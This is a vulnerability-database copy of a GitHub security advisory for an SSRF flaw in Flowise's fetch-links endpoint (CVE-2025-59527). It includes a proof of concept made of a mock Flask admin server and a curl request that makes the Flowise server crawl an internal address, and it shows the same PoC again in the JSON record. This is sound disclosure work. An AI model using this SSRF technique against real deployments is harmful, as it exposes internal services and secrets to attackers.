ghsa-hr92-4q35-4j3m
Vulnerability from github
Published
2025-09-15 19:53
Modified
2025-09-22 21:58
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
FlowiseAI/Flowise has Server-Side Request Forgery (SSRF) vulnerability
Details

Summary

A Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/v1/fetch-links endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. The impact includes the potential exposure of sensitive internal administrative endpoints.

Details

Vulnerability Overview

The fetch-links feature in Flowise is designed to extract links from external websites or XML sitemaps. It performs an HTTP request from the server to the user-supplied URL and parses the response (HTML or XML) to extract and return links.

The issue arises because the feature performs these HTTP requests without validating the user-supplied URL. In particular, when the relativeLinksMethod parameter is set to webCrawl or xmlScrape, the server directly calls the fetch() function with the provided URL, making it vulnerable to SSRF attacks.

Root Cause

The fetch() function is called without URL validation or restriction, which enables attackers to redirect the server to internal services.

Taint Flow

• Taint 01: Route Registration

https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24

• Taint 02: Service

https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18

• Taint 03: xmlScrape

https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478

PoC

PoC Description

This vulnerability was verified in a local development environment. The Flowise server was running at http://localhost:3000, and authentication was performed using the Bearer token:

tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q

Upon a successful attack, the Flowise server returned the entire link structure of the internal admin panel in JSON format. The response included sensitive administrative URLs such as:

  • /api/users (User Management)
  • /api/secrets (API Keys)
  • /api/database (Database Config)

This demonstrated that an attacker could enumerate internal web service structures.

Internal Admin Server (Mock)

```python from flask import Flask, render_template_string

app = Flask(name)

@app.route('/') def admin(): return render_template_string("""

Internal Admin Panel

""")

@app.route('/api/users') def users(): return render_template_string("""

Users

Back """)

@app.route('/api/secrets') def secrets(): return render_template_string("""

Secrets

Back """)

if name == 'main': app.run(host='127.0.0.1', port=8080) ```

curl Request Example

bash curl -G 'http://localhost:3000/api/v1/fetch-links' \ --data-urlencode 'url=http://127.0.0.1:8080/' \ --data-urlencode 'relativeLinksMethod=webCrawl' \ --data-urlencode 'limit=10' \ -H 'Authorization: Bearer tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q' \ -s | jq '.' image

Impact

This is a Server-Side Request Forgery (SSRF) vulnerability.

  • Who is impacted? Any user running Flowise server exposed to external traffic.
  • Risk: Attackers can leverage the Flowise server to:
  • Explore internal web applications
  • Bypass firewall rules
  • Access sensitive administrative interfaces
  • Leak internal configuration, credentials, or secrets

This vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in an enterprise environment.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.5"
            },
            {
              "fixed": "3.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "3.0.5"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59527"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-15T19:53:46Z",
    "nvd_published_at": "2025-09-22T20:15:39Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n---\n\nA Server-Side Request Forgery (SSRF) vulnerability was discovered in the `/api/v1/fetch-links` endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. The impact includes the potential exposure of sensitive internal administrative endpoints.\n\n\n### Details\n---\n\n#### Vulnerability Overview\n\nThe `fetch-links` feature in Flowise is designed to extract links from external websites or XML sitemaps. It performs an HTTP request from the server to the user-supplied URL and parses the response (HTML or XML) to extract and return links.\n\nThe issue arises because the feature performs these HTTP requests **without validating the user-supplied URL**. In particular, when the `relativeLinksMethod` parameter is set to `webCrawl` or `xmlScrape`, the server directly calls the `fetch()` function with the provided URL, making it vulnerable to SSRF attacks.\n\n#### Root Cause\n\nThe `fetch()` function is called without URL validation or restriction, which enables attackers to redirect the server to internal services.\n\n\n### Taint Flow\n\n#### \u2022 Taint 01: Route Registration\n\nhttps://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24\n\n#### \u2022 Taint 02: Service\n\nhttps://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18\n\n#### \u2022 Taint 03: xmlScrape\n\nhttps://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478\n\n\n### PoC\n---\n\n#### PoC Description\n\nThis vulnerability was verified in a local development environment. The Flowise server was running at `http://localhost:3000`, and authentication was performed using the Bearer token:\n\n```\ntmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q\n```\n\nUpon a successful attack, the Flowise server returned the entire link structure of the internal admin panel in JSON format. The response included sensitive administrative URLs such as:\n\n- `/api/users` (User Management)\n- `/api/secrets` (API Keys)\n- `/api/database` (Database Config)\n\nThis demonstrated that an attacker could enumerate internal web service structures.\n\n#### Internal Admin Server (Mock)\n\n```python\nfrom flask import Flask, render_template_string\n\napp = Flask(__name__)\n\n@app.route(\u0027/\u0027)\ndef admin():\n    return render_template_string(\"\"\"\n    \u003chtml\u003e\n    \u003ch1\u003eInternal Admin Panel\u003c/h1\u003e\n    \u003cul\u003e\n        \u003cli\u003e\u003ca href=\"/api/users\"\u003eUser Management\u003c/a\u003e\u003c/li\u003e\n        \u003cli\u003e\u003ca href=\"/api/secrets\"\u003eAPI Keys\u003c/a\u003e\u003c/li\u003e\n        \u003cli\u003e\u003ca href=\"/api/database\"\u003eDatabase Config\u003c/a\u003e\u003c/li\u003e\n        \u003cli\u003e\u003ca href=\"/api/logs\"\u003eSystem Logs\u003c/a\u003e\u003c/li\u003e\n    \u003c/ul\u003e\n    \"\"\")\n\n@app.route(\u0027/api/users\u0027)\ndef users():\n    return render_template_string(\"\"\"\n    \u003chtml\u003e\n    \u003ch1\u003eUsers\u003c/h1\u003e\n    \u003cul\u003e\n        \u003cli\u003e\u003ca href=\"/api/users/admin\"\u003eadmin (root)\u003c/a\u003e\u003c/li\u003e\n        \u003cli\u003e\u003ca href=\"/api/users/operator\"\u003eoperator\u003c/a\u003e\u003c/li\u003e\n    \u003c/ul\u003e\n    \u003ca href=\"/\"\u003eBack\u003c/a\u003e\n    \"\"\")\n\n@app.route(\u0027/api/secrets\u0027)\ndef secrets():\n    return render_template_string(\"\"\"\n    \u003chtml\u003e\n    \u003ch1\u003eSecrets\u003c/h1\u003e\n    \u003cul\u003e\n        \u003cli\u003e\u003ca href=\"/api/secrets/db_key\"\u003eDB Key: sk-1234567890abcdef\u003c/a\u003e\u003c/li\u003e\n        \u003cli\u003e\u003ca href=\"/api/secrets/aws_key\"\u003eAWS Key: AKIAIOSFODNN7EXAMPLE\u003c/a\u003e\u003c/li\u003e\n    \u003c/ul\u003e\n    \u003ca href=\"/\"\u003eBack\u003c/a\u003e\n    \"\"\")\n\nif __name__ == \u0027__main__\u0027:\n    app.run(host=\u0027127.0.0.1\u0027, port=8080)\n```\n\n#### curl Request Example\n\n```bash\ncurl -G \u0027http://localhost:3000/api/v1/fetch-links\u0027 \\\n     --data-urlencode \u0027url=http://127.0.0.1:8080/\u0027 \\\n     --data-urlencode \u0027relativeLinksMethod=webCrawl\u0027 \\\n     --data-urlencode \u0027limit=10\u0027 \\\n     -H \u0027Authorization: Bearer tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q\u0027 \\\n     -s | jq \u0027.\u0027\n```\n\u003cimg width=\"1914\" height=\"952\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6cb1abb1-0a31-43d4-8d9e-8d45f58051f3\" /\u003e\n\n\n### Impact\n---\n\nThis is a **Server-Side Request Forgery (SSRF)** vulnerability.\n\n- **Who is impacted?** Any user running Flowise server exposed to external traffic.\n- **Risk:** Attackers can leverage the Flowise server to:\n  - Explore internal web applications\n  - Bypass firewall rules\n  - Access sensitive administrative interfaces\n  - Leak internal configuration, credentials, or secrets\n\nThis vulnerability significantly increases the risk of **internal service enumeration and potential lateral movement** in an enterprise environment.",
  "id": "GHSA-hr92-4q35-4j3m",
  "modified": "2025-09-22T21:58:31Z",
  "published": "2025-09-15T19:53:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hr92-4q35-4j3m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59527"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "FlowiseAI/Flowise has Server-Side Request Forgery (SSRF) vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.